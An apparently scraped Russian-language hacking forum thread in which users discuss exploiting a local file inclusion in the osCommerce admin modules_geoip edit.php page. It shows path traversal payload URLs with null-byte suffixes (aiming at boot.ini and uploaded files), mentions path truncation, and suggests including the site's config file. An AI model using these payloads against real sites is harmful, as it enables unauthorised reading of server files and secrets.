![]() |
Нашел LFI, но незнаю как реализовать...
http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../../../../../../../../../../../../boot.ini%00 Все бы хорошо, но помимо include() эта переменная используется еще где-то: Код:
Code:Код:
Code: |
Цитата:
Проинклудь конфиг, поиграйся. |
Pirotexnik
Шляпу экстрасенса, увы, потерял, поэтому требую код ф-ции loadIniFile =\ И строку с инклюдом данной переменной тоже неплохо бы увидеть. pharm_all Что-что, простите? Каким образом он проинклюдит (и как это поможет!?) если у него не работает инклюд? |
http://screenshotuploader.com/i/01/qw3D0bB6I.png
Что я делаю не так? Цитата:
|
Да, затупил я...
Теперь вопрос по поводу .php http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../lfi - GOOD http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../lfi.php%00 - BAD http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../lfi.gif%00 - BAD ./[4096] - тоже не спасли. Это у меня на локалхосте косяк?) Как быть? |
потому что скорее всего не правильно юзаешь аналог нульбайту
|
А как тгда правильно? О_о
|
| Время: 02:26 |